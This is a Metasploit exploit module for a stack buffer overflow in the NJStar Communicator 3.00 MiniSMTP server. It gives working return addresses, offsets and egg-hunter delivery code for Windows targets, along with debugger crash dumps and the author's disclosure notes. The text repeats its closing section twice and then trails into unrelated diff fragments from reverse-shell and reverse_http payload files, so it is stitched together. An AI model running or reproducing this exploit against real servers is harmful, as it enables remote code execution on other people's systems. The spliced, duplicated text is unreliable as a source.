# thanks to bannedit for advice on threads and
# making multiple connections to get around
# stack space constraints. :)
connect
print_status("Sending our buffer containing the egg hunter...")
sock.put(buffer)
handler
disconnect
end
end
=begin
Dillon Beresford
https://twitter.com/#!/D1N
NJStar Communicator
Version: 3.00 and prior
Build: 11818 and prior
Tested minismtp version:
1.30.0.60218
Shouts to bannedit, sinn3r, rick2600, tmanning, corelanc0d3r, jcran,
manils, d0tslash, mublix, halsten, and everyone at AHA!
No response as of 10/31/11 from AUSCERT or the software vendor. CNCERT and USCERT responded
on 10/30/11 and 10/31/11, CNCERT said in an email they needed to see if the vulnerability
is remotely exploitable and needed more verification. I sent a proof of concept exploit
in python with remote code execution. So, here is the proof that the bug is, in fact,
remotely exploitable. WIN!
System DLLs are used for target.ret because minismtp.exe is the only NJStar component in
memory, and its base starts with a 0x00, that's no good. However, if your target machine
started minismtp from the Windows start menu (Start -> All Programs -> NJStar Communicator
-> NJStar MiniSmtp), it'd actually load up more DLLs. And one of them -- MSVCR100.dll -- is
ideal enough to use (No rebase, starts with a high address, but there is an ASLR flag).
eax=00000000 ebx=00417bf8 ecx=00002745 edx=00000000 esi=008a3e50
edi=008a3d80
eip=42424242 esp=00ccff70 ebp=7c8097d0 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00010206
42424242 ?? ???
0:003> !exchain
image00400000+bbc4 (0040bbc4)
00ccff00: 41414141
Invalid exception stack at 41414141
0:003> d esp
00ccff70 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
00ccff80 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
00ccff90 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
00ccffa0 44 44 44 44 00 ff cc 00-c4 bb 40 00 20 23 41 00 DDDD......@. #A.
00ccffb0 00 00 00 00 ec ff cc 00-29 b7 80 7c b8 3d 8a 00 ........)..|.=..
00ccffc0 00 00 00 00 00 00 00 00-b8 3d 8a 00 00 c0 fd 7f .........=......
00ccffd0 00 d6 e3 89 c0 ff cc 00-98 08 99 89 ff ff ff ff ................
00ccffe0 d8 9a 83 7c 30 b7 80 7c-00 00 00 00 00 00 00 00 ...|0..|........
=end
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Egghunter
def initialize(info = {})
super(update_info(info,
'Name' => 'NJStar Communicator 3.00 MiniSMTP Server Remote Exploit',
'Description' => %q{
This module exploits a stack buffer overflow vulnerability in NJStar Communicator
Version 3.00 MiniSMTP server. The MiniSMTP application can be seen in multiple
NJStar products, and will continue to run in the background even if the
software is already shutdown. According to the vendor's testimonials,
NJStar software is also used by well known companies such as Siemens, NEC,
Google, Yahoo, eBay; government agencies such as the FBI, Department of
Justice (HK); as well as a long list of universities such as Yale, Harvard,
University of Tokyo, etc.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Dillon Beresford', # Original discovery and MSF Module.
],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '76728' ],
#[ 'CVE', '' ],
[ 'URL', 'http://www.njstar.com/cms/njstar-communicator' ],
[ 'URL', 'http://www.exploit-db.com/exploits/18057/' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00",
'StackAdjustment' => -1500,
},
'Targets' =>
[
[
'Windows XP SP2/SP3',
{
'Ret' => 0x77c35459, # PUSH ESP; RETN (MSVCRT.dll)
'Offset' => 247,
}
],
[
# Can't test patch level on this one, because you can't
# even update Win2k3 SP0 anymore from Windows Update
'Windows Server 2003 SP0',
{
'Ret' => 0x77d20738, # JMP ESP (USER32.dll)
'Offset' => 247,
}
],
[
'Windows Server 2003 SP1/SP2',
{
'Ret' => 0x77BE2265, # PUSH ESP; RETN (MSVCRT.dll)
'Offset' => 247,
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Oct 31 2011',
'DefaultTarget' => 0))
register_options([Opt::RPORT(25)], self.class)
end
def check
connect
# We get a response like: "220 [host-name] Service Ready"
# But we don't really care about this one
res = sock.get_once(-1, 5)
vprint_status("Banner: #{res.to_s.chop}")
sock.puts("HELP\r\n")
# But the HELP response will tell us if this is a NJStar SMTP or not
res = sock.get_once(-1, 5)
vprint_status("HELP Response: #{res.to_s.chop}")
disconnect
# I can only flag it as "Detected" because it doesn't return a version
if res =~ /Windows E-mail Server From NJStar Software/i
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end
def exploit
eggoptions =
{
:checksum => true,
:eggtag => "w00t"
}
hunter,egg = generate_egghunter(payload.encoded,payload_badchars,eggoptions)
buffer = rand_text(target['Offset'])
buffer << [target.ret].pack('V')
buffer << hunter
buffer << make_nops(4)
# Just some debugging output so we can see lengths and byte size of each of our buffer.
vprint_status("egg: %u bytes: \n" % egg.length + Rex::Text.to_hex_dump(egg))
vprint_status("hunter: %u bytes: \n" % hunter.length + Rex::Text.to_hex_dump(hunter))
vprint_status("buffer: %u bytes:\n" % buffer.length + Rex::Text.to_hex_dump(buffer))
print_status("Trying target #{target.name}...")
# har har har you get trick no treat...
# we dont have very much space so we
# send our egg in a seperate connection
connect
print_status("Sending the egg...")
sock.put(egg)
# I think you betta call, ghostbusters...
# now we send our evil buffer along with the
# egg hunter, we are doing multiple connections
# to solve the issue with limited stack space.
# thanks to bannedit for advice on threads and
# making multiple connections to get around
# stack space constraints. :)
connect
print_status("Sending our buffer containing the egg hunter...")
sock.put(buffer)
handler
disconnect
end
end
=begin
Dillon Beresford
https://twitter.com/#!/D1N
NJStar Communicator
Version: 3.00 and prior
Build: 11818 and prior
Tested minismtp version:
1.30.0.60218
Shouts to bannedit, sinn3r, rick2600, tmanning, corelanc0d3r, jcran,
manils, d0tslash, mublix, halsten, and everyone at AHA!
No response as of 10/31/11 from AUSCERT or the software vendor. CNCERT and USCERT responded
on 10/30/11 and 10/31/11, CNCERT said in an email they needed to see if the vulnerability
is remotely exploitable and needed more verification. I sent a proof of concept exploit
in python with remote code execution. So, here is the proof that the bug is, in fact,
remotely exploitable. WIN!
System DLLs are used for target.ret because minismtp.exe is the only NJStar component in
memory, and its base starts with a 0x00, that's no good. However, if your target machine
started minismtp from the Windows start menu (Start -> All Programs -> NJStar Communicator
-> NJStar MiniSmtp), it'd actually load up more DLLs. And one of them -- MSVCR100.dll -- is
ideal enough to use (No rebase, starts with a high address, but there is an ASLR flag).
eax=00000000 ebx=00417bf8 ecx=00002745 edx=00000000 esi=008a3e50
edi=008a3d80
eip=42424242 esp=00ccff70 ebp=7c8097d0 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00010206
42424242 ?? ???
0:003> !exchain
image00400000+bbc4 (0040bbc4)
00ccff00: 41414141
Invalid exception stack at 41414141
0:003> d esp
00ccff70 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
00ccff80 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
00ccff90 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
00ccffa0 44 44 44 44 00 ff cc 00-c4 bb 40 00 20 23 41 00 DDDD......@. #A.
00ccffb0 00 00 00 00 ec ff cc 00-29 b7 80 7c b8 3d 8a 00 ........)..|.=..
00ccffc0 00 00 00 00 00 00 00 00-b8 3d 8a 00 00 c0 fd 7f .........=......
00ccffd0 00 d6 e3 89 c0 ff cc 00-98 08 99 89 ff ff ff ff ................
00ccffe0 d8 9a 83 7c 30 b7 80 7c-00 00 00 00 00 00 00 00 ...|0..|........
=end

2
modules/payloads/singles/generic/custom.rb
View File

@ -30,7 +30,7 @@ module Metasploit3
'Payload' => "" # not really
}
))
# Register options
register_options(
[

4
modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb
View File

@ -56,14 +56,14 @@ module Metasploit3
int 80h ; @0000000c cd80
xchg ebx, eax ; @0000000e 93
pop ecx ; @0000000f 59
; Xrefs: 0000000f, 00000015
xref_00000010_uuidfdbd8:
mov al, 3fh ; @00000010 b03f
int 80h ; @00000012 cd80
dec ecx ; @00000014 49
jns xref_00000010_uuidfdbd8 ; @00000015 79f9 -- to 10h
; Xrefs: 00000015
pop ebx ; @00000017 5b
pop edx ; @00000018 5a

2
modules/payloads/stagers/java/reverse_http.rb
View File

@ -51,7 +51,7 @@ module Metasploit3
c << "URL=http://#{datastore["LHOST"]}"
c << ":#{datastore["LPORT"]}" if datastore["LPORT"]
c << "/INITJM\n"
c
end

Some files were not shown because too many files have changed in this diff Show More